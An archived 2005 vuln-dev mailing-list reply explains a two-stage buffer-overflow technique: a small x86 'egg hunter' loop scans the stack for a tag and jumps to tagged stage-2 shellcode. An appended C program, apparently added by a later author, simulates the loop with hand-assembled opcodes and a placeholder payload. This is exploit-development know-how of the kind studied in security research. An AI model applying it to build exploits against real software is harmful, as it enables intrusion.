Vulnerability Development mailing list archives

Re: Exploitation Help


From: Felix Lindner <felix.lindner () nruns com>
Date: Wed, 18 May 2005 10:20:39 +0200

On 17 May 2005 09:20:51 -0000
<ramatkal () hotmail com> wrote:

> So, I am basically thinking, I overflow EIP with an address that JMPs -260
> to the beginning of the Authorization header. The Authorization header then
> contains my Stage1 shellcode that starts searching down the stack for my
> Stage2 shellcode, which it will find about 2k down the stack in the GET
> request.....
>
> I hope somebody understands what the hell I am talking about....

You could easily implement a small piece of code in the 250 byte buffer doing
the following:

        mov esi,esp                     ; start scanning at the current stack pointer
Loop:
        inc esi                         ; advance one byte at a time
        cmp dword [esi],0x12345678      ; 4-byte tag that marks the start of stage 2
        je found
        jmp short Loop
found:
        add esi,4                       ; skip the tag itself
        jmp esi                         ; transfer control to stage 2

and begin your "real" shellcode with 0x12345678 or any other pattern for that
matter.

cheers
Felix

-- 
 Felix Lindner, CISSP | Senior Security Consultant, n.runs GmbH
         fx () nruns com | +49 (0)171 740 20 62
A hacker does for love what others would not do for money.
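The following is an added illustration of the search loop above, not code from Felix's post: a C model of a stack region with the stage-1 loop (assembled for 32-bit x86, encodings assumed by me) at a low offset and the tagged stage 2 about 2 KB higher, as the original poster describes. The layout, offsets and the "STAGE2" placeholder payload are constructed for the example. It also shows the caveat a practitioner should keep in mind: the tag 0x12345678 also exists as the immediate of the cmp instruction inside stage 1, so the scan must begin past the stage-1 code (which it does when esi starts at esp after the ret that popped the overwritten EIP) or it finds its own immediate first.

```c
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* The tag stage 2 starts with, as it sits in x86 memory: little-endian
 * bytes of 0x12345678, the same bytes the cmp immediate in stage 1 uses. */
static const unsigned char EGG_TAG[4] = { 0x78, 0x56, 0x34, 0x12 };

/* Byte-by-byte scan of 'region' from 'start' upwards, mirroring
 * "inc esi; cmp dword [esi],tag". Returns the offset just past the first
 * 4-byte match (what "add esi,4; jmp esi" transfers to), or -1 if none. */
long find_egg(const unsigned char *region, size_t len, size_t start)
{
    for (size_t off = start; off + sizeof EGG_TAG <= len; off++)
        if (memcmp(region + off, EGG_TAG, sizeof EGG_TAG) == 0)
            return (long)(off + sizeof EGG_TAG);
    return -1;
}

/* Constructed stand-in for the stack area (assumption for this example):
 * stage 1 at offset 0, filler, then the tag followed by stage 2 at +2048. */
#define STAGE1_OFF 0
#define STAGE2_OFF 2048
#define REGION_LEN 4096

/* The search loop from the post, hand-assembled for 32-bit x86. */
static const unsigned char STAGE1[] = {
    0x8b, 0xf4,                          /* mov esi,esp                 */
    0x46,                                /* Loop: inc esi               */
    0x81, 0x3e, 0x78, 0x56, 0x34, 0x12,  /* cmp dword [esi],0x12345678  */
    0x74, 0x02,                          /* je found                    */
    0xeb, 0xf5,                          /* jmp short Loop              */
    0x83, 0xc6, 0x04,                    /* found: add esi,4            */
    0xff, 0xe6                           /* jmp esi                     */
};
static const unsigned char STAGE2[] = "STAGE2";  /* placeholder payload */

/* Fill 'region' (REGION_LEN bytes) and return where stage 2 really begins. */
size_t build_region(unsigned char *region)
{
    memset(region, 0x41, REGION_LEN);                  /* filler */
    memcpy(region + STAGE1_OFF, STAGE1, sizeof STAGE1);
    memcpy(region + STAGE2_OFF, EGG_TAG, sizeof EGG_TAG);
    memcpy(region + STAGE2_OFF + sizeof EGG_TAG, STAGE2, sizeof STAGE2);
    return STAGE2_OFF + sizeof EGG_TAG;
}

int main(void)
{
    unsigned char region[REGION_LEN];
    size_t want = build_region(region);

    /* Scanning from below stage 1 hits the tag embedded in the cmp
     * immediate first and would jump into the middle of stage 1. */
    long bad = find_egg(region, REGION_LEN, 0);
    /* Scanning from just past stage 1 (where esp is after the ret that
     * popped the overwritten EIP) finds the real tag. */
    long good = find_egg(region, REGION_LEN, sizeof STAGE1);

    printf("scan from 0: offset %ld (inside stage 1)\n", bad);
    if (good >= 0)
        printf("scan from %zu: offset %ld, expected %zu, payload \"%s\"\n",
               sizeof STAGE1, good, want, (const char *)region + good);
    return good == (long)want ? 0 : 1;
}
```

Build with any C compiler and run; the first scan reports offset 9 (the byte after the immediate inside stage 1), the second reports 2052, which is where the placeholder stage 2 starts.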

